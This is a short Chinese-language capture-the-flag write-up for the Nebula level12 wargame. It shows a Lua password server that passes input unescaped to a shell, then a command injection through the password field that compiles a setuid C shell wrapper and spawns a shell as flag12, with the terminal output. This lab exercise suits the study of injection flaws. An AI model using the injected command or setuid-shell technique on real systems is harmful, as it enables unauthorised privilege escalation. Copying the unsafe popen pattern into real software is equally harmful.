程序源碼爲lua腳本:
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))
function hash(password)
prog = io.popen("echo "..password.." | sha1sum", "r")
data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
end
while 1 do
local client = server:accept()
client:send("Password: ")
client:settimeout(60)
local line, err = client:receive()
if not err then
print("trying " .. line) -- log from where ;\
local h = hash(line)
if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
client:send("Better luck next time\n");
else
client:send("Congrats, your token is 413**CARRIER LOST**\n")
end
end
client:close()
end
可以對password進行注入:
1. 在/tmp目錄下創建shell.c:
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/bin/bash");
}
2. 參數注入:
level12@nebula:/tmp$ nc localhost 50001
Password: 1; gcc -o /tmp/shell /tmp/shell.c; cp /tmp/shell /home/flag12; chmod +s /home/flag12/shell echo 1
3. 然後運行/home/flag12/shell即可:
level12@nebula:/tmp$ cd /home/flag12
level12@nebula:/home/flag12$ ls -l
total 9
-rw-r--r-- 1 root root 685 2011-11-20 21:22 flag12.lua
-rwsr-sr-x 1 flag12 flag12 7321 2016-12-29 19:54 shell
level12@nebula:/home/flag12$ date
Thu Dec 29 19:55:36 PST 2016
level12@nebula:/home/flag12$ ./shell
flag12@nebula:/home/flag12$